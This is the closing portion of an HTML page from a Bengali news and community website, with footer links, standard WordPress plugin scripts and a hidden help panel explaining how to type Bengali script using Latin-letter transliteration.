href="http://www.youtube.com/user/banglami" target="_blank">Subscribe</a></span></div></div> <!-- ./block --><style>#td_uid_21_598490d41872d .td_social_button a { background-color:#}</style>                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                                            </div>
            </div>
        </div> <!-- /.td-footer-wrap  -->
    

    
    <div class="td-sub-footer-wrap">
        <div class="container ">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                                <div class="span4 td-sub-footer-copy">
                                    &copy; Copyright © 2016-17 Celcius Technologies Pvt. Ltd. All Rights Reserved.                                </div>
                                <div class="span8 td-sub-footer-menu">

                                    <div class="menu-footer-menu-container"><ul id="menu-footer-menu" class=""><li id="menu-item-136437" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-136437"><a href="http://banglalive.com/">Home</a></li>
<li id="menu-item-136464" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136464"><a href="http://banglalive.com/disclaimer/">Disclaimer</a></li>
<li id="menu-item-136462" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136462"><a href="http://banglalive.com/privacy/">Privacy</a></li>
<li id="menu-item-136463" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136463"><a href="http://banglalive.com/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-136461" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136461"><a href="http://banglalive.com/advertise-with-us/">Advertise with us</a></li>
<li id="menu-item-136460" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136460"><a href="http://banglalive.com/contact-us/">Contact Us</a></li>
</ul></div>                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    
    </div>
    <!--/#inner-wrap-->
    </div>
    <!--/#outer-wrap-->

    <div class="td-sp td-scroll-up"></div>

    <!-- ngg_resource_manager_marker --><script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/responsive-lightbox/assets/swipebox/js/jquery.swipebox.min.js?ver=1.6.10'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var rlArgs = {"script":"swipebox","selector":"lightbox","customEvents":"","activeGalleries":"1","animation":"1","hideCloseButtonOnMobile":"0","removeBarsOnMobile":"0","hideBars":"1","hideBarsDelay":"5000","videoMaxWidth":"1080","useSVG":"1","loopAtEnd":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/responsive-lightbox/js/front.js?ver=1.6.10'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcAjax = "http:\/\/banglalive.com\/wp-admin\/admin-ajax.php";
/* ]]> */
</script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/wp-cloudy/js/wp-cloudy-ajax.js?ver=59b04a3079edb07358ebd277a4c9e9d3'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/js/jquery.rateit.min.js?ver=1.0.22'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/ui/progressbar.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/ui/tooltip.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var yasrCommonData = {"postid":"208502","ajaxurl":"http:\/\/banglalive.com\/wp-admin\/admin-ajax.php","loggedUser":"","visitorStatsEnabled":"yes","tooltipValues":["bad","poor","ok","good","super"],"loaderHtml":"<div id=\"loader-visitor-rating\" >\u00a0 Loading, please wait <img src=http:\/\/banglalive.com\/wp-content\/plugins\/yet-another-stars-rating\/img\/loader.gif title=\"yasr-loader\" alt=\"yasr-loader\"><\/div>"};
/* ]]> */
</script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/js/yasr-front.js?ver=1.0.0'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper/js/td_external.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper/js/min/site.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/wp-embed.min.js?ver=59b04a3079edb07358ebd277a4c9e9d3'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/comment-reply.min.js?ver=59b04a3079edb07358ebd277a4c9e9d3'></script>


    <!--

        Theme: Newspaper by tagDiv 2014
        Version: 4.6.1 (rara)
        Deploy mode: deploy
        Speed booster: v3.2

        uid: 598490d41ee71
    -->

    
            <style type="text/css" media="screen">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</style><link rel='stylesheet' id='google-font-rest-css'  href='http://fonts.googleapis.com/css?family=PT+Sans:400,700,400italic|Ubuntu:400,400italic|Open+Sans:400italic,400|Oswald:400,700|Roboto+Condensed:400italic,700italic,400,700?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-bootstrap-css'  href='http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper/includes/wp_booster/external/bootstrap/td-bootstrap.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper-child/style.css?ver=4.6.1' type='text/css' media='all' />

<!-- Style compiled by theme -->

<style>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</style>


<!-- JS generated by theme -->

<script>
    
</script>


                <script language="javascript">
                    td_ajax_count.td_get_views_counts_ajax("post","[208502]");
                </script>
                    <div class="detail-help" style="display:none;">
     
<div class="topictitle"><a name="vowel"></a>Vowel</div>
    <blockquote><p>
        <br><span class="bengalichar">অ</span> = a, <span class="bengalichar">আ</span> = aa, <span class="bengalichar">ই</span> = i, <span class="bengalichar">ঈ</span> = ee, <span class="bengalichar">উ</span> = u, <span class="bengalichar">ঊ</span> = oo, <span class="bengalichar">ঋ</span> = Ri, <span class="bengalichar">ৠ</span> = RI, <span class="bengalichar">ঌ</span> = Li~, <span class="bengalichar">ৡ</span> = LI~, <span class="bengalichar">এ</span> = e, <span class="bengalichar">ঐ</span> = ai, <span class="bengalichar">ও</span> = o, <span class="bengalichar">ঔ</span> = au, <span class="bengalichar">অং</span> = aM, <span class="bengalichar">অঁ</span> = aM~, <span class="bengalichar">অঃ</span> = a:
    </p></blockquote>
    <div class="topictitle"><a name="consonant"></a>Consonant</div>
    <blockquote><p>
        <br><span class="bengalichar">ক</span> = k, <span class="bengalichar">খ</span> = kh, <span class="bengalichar">গ</span> = g, <span class="bengalichar">ঘ</span> = gh, <span class="bengalichar">ঙ</span> = NG, <br><span class="bengalichar">চ</span> = ch, <span class="bengalichar">ছ</span> = chh, <span class="bengalichar">জ</span> = j, <span class="bengalichar">ঝ</span> = jh, <span class="bengalichar">ঞ</span> = NY, <br><span class="bengalichar">ট</span> = T, <span class="bengalichar">ঠ</span> = Th, <span class="bengalichar">ড</span> = D, <span class="bengalichar">ঢ</span> = Dh, <span class="bengalichar">ণ</span> = N, <br><span class="bengalichar">ত</span> = t, <span class="bengalichar">থ</span> = th, <span class="bengalichar">দ</span> = d, <span class="bengalichar">ধ</span> = dh, <span class="bengalichar">ন</span> = n, <br><span class="bengalichar">প</span> = p, <span class="bengalichar">ফ</span> = ph, <span class="bengalichar">ব</span> = b, <span class="bengalichar">ভ</span> = bh, <span class="bengalichar">ম</span> = m, <br><span class="bengalichar">য</span> = y, <span class="bengalichar">র</span> = r, <span class="bengalichar">ল</span> = l, <span class="bengalichar">শ</span> = sh, <span class="bengalichar">ষ</span> = Sh, <br><span class="bengalichar">স</span> = s, <span class="bengalichar">হ</span> = h, <span class="bengalichar">ক্ষ</span> = kSh, <span class="bengalichar">জ্ঞ</span> = Gy
    </p></blockquote>
    <div class="topictitle">Additional Consonant</div>
    <blockquote><p><br><span class="bengalichar">ৎ</span> = t ~ (Khand t)<br><span class="bengalichar">ড়</span> = D*<br><span class="bengalichar">ঢ়</span> = Dh*<br><span class="bengalichar">য়</span> = y*</p></blockquote>
    <div class="topictitle"><a name="vowelsign">Vowel Sign</a></div>
    <blockquote>
    <div>
      <br><span class="bengalichar">া</span> = aa, <span class="bengalichar">ি</span> = i, <span class="bengalichar">ী</span> = ee, <span class="bengalichar">ু</span> = u, <span class="bengalichar">ূ</span> = oo, <span class="bengalichar">ৃ</span> = Ri, <span class="bengalichar">ৄ</span> = RI, <span class="bengalichar">ৢ</span> = Li~, <span class="bengalichar">ৣ</span> = LI~, <span class="bengalichar">ে</span> = e, <span class="bengalichar">ৈ</span> = ai, <span class="bengalichar">ো</span> = o, <span class="bengalichar">ৌ</span> = au, <span class="bengalichar">ৗ</span> = aU (au length mark), <span class="bengalichar">ঁ</span> = M~ (Chandrabindu), <span class="bengalichar">ং</span> = M (Anusvar), <span class="bengalichar">ঃ</span> = : (Visarg)
      </div>
    <div>&nbsp;</div>
    <div class="rp"><strong>Note</strong>: Dotted round symbol represents placeholder for consonant character</div>
    </blockquote>
    <div class="topictitle"><a name="digit"></a>Digit</div>
    <blockquote>
    <div>
            <br><span class="bengalichar">০</span> = 0, <span class="bengalichar">১</span> = 1, <span class="bengalichar">২</span> = 2, <span class="bengalichar">৩</span> = 3, <span class="bengalichar">৪</span> = 4, <span class="bengalichar">৫</span> = 5, <span class="bengalichar">৬</span> = 6, <span class="bengalichar">৭</span> = 7, <span class="bengalichar">৮</span> = 8, <span class="bengalichar">৯</span> = 9
        </div>
   
    <div class="topictitle"><a name="other"></a>Other</div>
    <blockquote>
    <div>
        <br><span class="bengalichar">্</span> = See example (Hasant/Viram)<br><span class="bengalichar">়</span> = * (Nukta)<br><span class="bengalichar">ʼ</span> = ' (Urdhacomma)<br><span class="bengalichar">ঽ</span> = &amp; (Avagrah)<br><span class="bengalichar">৺</span> = ~ (Isshar)<br><span class="bengalichar">৹</span> = a~ (Bengali ana sign)<br><span class="bengalichar">৲</span> = Rs~ (Bengali Rupee sign)<br><span class="bengalichar">৳</span> = T~ (Taka sign)<br><span class="bengalichar">।</span> = | (Devanagari danda)<br><span class="bengalichar">॥</span> = || (Devanagari double danda)<br><span class="bengalichar">₹</span> = Rs (Indian Rupee sign)<br><span class="bengalichar">卐</span> = +~ (Swastika sign)<br><span class="bengalichar">Zero Width Joiner</span> = ^<br><span class="bengalichar">Zero Width Non Joiner</span> = ^^
      </div>
    <div class="rp"><strong>Note</strong>: Dotted round symbol represents placeholder for consonant character</div>
    </blockquote>
    <div class="topictitle"><a name="symbol"></a>Symbol</div>
    <blockquote>
    <div>
            The English symbols [ ] { } ( ) &lt; &gt; - + / = ; . , " ? ! % \ _ $ @ #  translate into the same symbols.
        </div>
    <div>Symbols &amp; ~ * : ^ | '  have special meaning. You can type this way<br><br />
        <br><span class="bengalichar">&amp;</span> = &amp;~<br><span class="bengalichar">~</span> = ~~<br><span class="bengalichar">*</span> = *~<br><span class="bengalichar">:</span> = :~<br><span class="bengalichar">^</span> = ^~<br><span class="bengalichar">|</span> = |~<br><span class="bengalichar">'</span> = '~
        </div>
    <div>These symbols will type Bengali characters first but if "~" will be<br />
        followed, it will remove previously typed Bengali character and then type the<br />
        symbol.</div>
    </blockquote>
    <div class="topictitle"><a name="rule"></a>Rule</div>
    <blockquote>
    <ol>
    <li>Consonant is followed by vowel character to make live consonant.<br><br />
    <div class="example">Example<br><br />
                <span class="bengalichar">ক কা কি কী কু কূ কৃ কৄ কৢ কৣ কে কৈ কো কৌ কঁ কং কঃ</span><br>ka kaa ki kee ku koo kRi kRI kLi~ kLI~ ke kai ko kau kaM~ kaM ka:</div>
    </li>
    <li>Two or more consecutive consonants make consonant cluster. The last consonant takes the full form and<br />
            all preceding consonants within cluster take half form<br></p>
    <div class="example">Example<br><br />
                <span class="bengalichar">নমস্কার</span> can be written by typing<br />
                "namaskaar"</div>
    </li>
    <li>Special consonant cluster forms (ligature) will be created automatically if it is available in the font.<br />
                Look at the examples for clarification. All possible ligatures may not<br />
                be given in the example. Try typing the consonant combinations according<br />
                to ligature pronounciation and hopefully it will work. For example, try typing<br />
                "vidhyaa", "viDyaa", "vidyaa" to get the correct ligature for "dy"<br />
                in "vidyaa".
            </li>
    </ol>
    </blockquote>
    <div class="topictitle"><a name="zwj"></a>ZWJ/ZWNJ character</div>
    <blockquote>
    <div>As per Rule # 3, ligature will be rendered. ZWJ and ZWNJ characters are used to produce alternate rendering of ligature.</div>
    <p>A consonant followed by ZWJ character will produce half-formed consonant character.</p>
    <div class="example">Example<br><br><span class="bengalichar">প্রশ্ন</span> = prashn<br><span class="bengalichar">প্রশ্&zwj;ন</span> = prash^n</div>
    <p>A consonant followed by ZWNJ character will produce dead consonant character.</p>
    <div class="example">Example<br><br><span class="bengalichar">প্রশ্ন</span> = prashn<br><span class="bengalichar">প্রশ্&zwnj;ন</span> = prash^^n</div>
    <p>If two english characters are making one Bengali Vowel (i.e. ai, au), then<br />
        ZWJ character is used to separate them into two different vowels. It will not<br />
        add ZWJ character but only considered as the separator between two<br />
        vowels.</p>
    <div class="example">Example<br><br><span class="bengalichar">ঐরাবত</span> = airaabat<br><span class="bengalichar">অইরাবত</span> = a^iraabat</div>
    </blockquote>
    <div class="topictitle"><a name="example"></a>Example</div>
    <blockquote>
    <div class="example"><br><span class="bengalichar">সুপ্রভাত</span> = suprabhaat<br><span class="bengalichar">কর্ম</span> = karm<br><span class="bengalichar">শ্রী</span> = shree<br><span class="bengalichar">বিদ্যা</span> = bidyaa<br><span class="bengalichar">পদ্ম</span> = padm<br><span class="bengalichar">পদ্&zwnj;ম</span> = pad^^m<br><span class="bengalichar">প্রশ্ন</span> = prashn<br><span class="bengalichar">প্রশ্&zwj;ন</span> = prash^n<br><span class="bengalichar">ঐ</span> = ai<br><span class="bengalichar">অই</span> = a^i<br><span class="bengalichar">ঔ</span> = au<br><span class="bengalichar">অউ</span> = a^u<br><span class="bengalichar">&amp;</span> = &amp;~<br><span class="bengalichar">~</span> = ~~<br><span class="bengalichar">*</span> = *~<br><span class="bengalichar">:</span> = :~<br><span class="bengalichar">^</span> = ^~<br><span class="bengalichar">|</span> = |~<br><span class="bengalichar">'</span> = '~</div>
    </blockquote>


<style>
#indiccmc .topictitle {
  clear: both;
  margin: 10px 0;
  color:#ae2829;
}
#indiccmc blockquote, #indiccmc div1 {
  margin: 5px 0;
  background:# e1e1e1;
  padding: 5px;
}
#indiccmc blockquote br1 {
  display:none;
}
#indiccmc blockquote p, #indiccmc blockquote span,  #indiccmc .rp, #indiccmc div, #indiccmc blockquote ol li {
    font-size: 18px;
    color: #000;font-weight: normal;
}
</style>
</div>




    <script>
        jQuery(document).ready(function(){
            jQuery('.top-header-menu .menu-item-first').html(jQuery('#indicimelayer').html());
            jQuery('.top-header-menu .menu-item-first #indiccmc').append(jQuery('.detail-help').html());
            jQuery('.detail-help').hide();
                        jQuery('.page-id-136304 .force-login').click(function(){
                jQuery.cookie("user_blog", 1);
                jQuery('a.td-login-modal-js').click();
                return false;
            });
            jQuery('.force-login').click(function(){
                jQuery('a.td-login-modal-js').click();
                return false;
            });
                       var raajs = (jQuery("#indicscript").val() == '_globalIndicIME') ? document.getElementById('indicscript').value:pphText.getScript('_globalIndicIME');
           //console.log('SANNY'+raajs);
            if(raajs == 'bengali') {
                jQuery("#indicscript").val("bengali");
            }

            jQuery('.topic.bbpress .entry-crumbs a').each(function(){
                if(jQuery(this).attr('href') == 'majlish'){
                    // jQuery(this).attr('href', 'javascript:void()');
                    // jQuery(this).text(jQuery('h1.entry-title a').text()); 
                    jQuery(this).parent().text(jQuery('h1.entry-title a').text()); 
                    jQuery(this).remove();
                }
            }) ;


            /* -- Majlish Show Hide Content -- */ 

            jQuery('a.topic-close-toggle').live('click', function(){
                var toogle_id = jQuery(this).attr('id').replace('toggle-topic-', '');
                 jQuery('#topic-full-'+toogle_id).slideUp(500);
                 jQuery('#topic-excerpt-'+toogle_id).slideDown(500);
                 jQuery('.sanny-view-all').hide();
                 jQuery('a.topic-close-toggle').text('More ↓');
                 jQuery('body').animate({scrollTop: jQuery(this).parent().offset().top - 100 },'slow');
                 jQuery('a.topic-close-toggle').addClass('sanny-full');
                 jQuery(this).removeClass('topic-close-toggle');
            });
            jQuery('a.sanny-full').live('click', function(){
                var toogle_id = jQuery(this).attr('id').replace('toggle-topic-', '');
                 //console.log(toogle_id+jQuery(this).attr('class'));
                 jQuery('.sanny-full-content').hide();
                 jQuery('.sanny-excerpt').show();
                 jQuery('a.sanny-full').text('More ↓');
                 jQuery('a.topic-close-toggle').text('More ↓');
                 jQuery('a.topic-close-toggle').addClass('sanny-full');
                 jQuery('a.topic-close-toggle').removeClass('topic-close-toggle');
                 jQuery('.sanny-view-all').hide();

                 jQuery('#toggle-topic-view-'+toogle_id).show();
                 jQuery('#topic-excerpt-'+toogle_id).hide();
                 jQuery('#topic-full-'+toogle_id).slideDown(500);
                 jQuery('body').animate({scrollTop: jQuery(this).parent().offset().top - 100 },'slow');
                 jQuery(this).text('Close ↑');
                 jQuery(this).addClass('topic-close-toggle');
                 jQuery(this).removeClass('sanny-full');
            });
            /* -- Majlish Show Hide Content -- */ 
        });
    </script>




<!-- FONT TYPING -->
<!-- FONT TYPING -->
















<!-- SLIDER IMAGE -->
<!-- Javascript tag  -->
<!-- begin ZEDO for channel:  RS70_BanglaLive_Slider_2811 , publisher: BanglaLive_MA , Ad Dimension: Slider - 1 x 1 -->

<!-- ########################### 24-01-2017
<script language="JavaScript">
var zflag_nid="2710"; var zflag_cid="1487"; var zflag_sid="263"; var zflag_width="1"; var zflag_height="1"; var zflag_sz="94"; 
</script>
<script language="JavaScript" src="http://xp2.zedo.com/jsc/xp2/fo.js"></script>
########################### -->
<!-- end ZEDO for channel:  RS70_BanglaLive_Slider_2811 , publisher: BanglaLive_MA , Ad Dimension: Slider - 1 x 1 -->

<!-- SLIDER IMAGE -->





</body>
</html>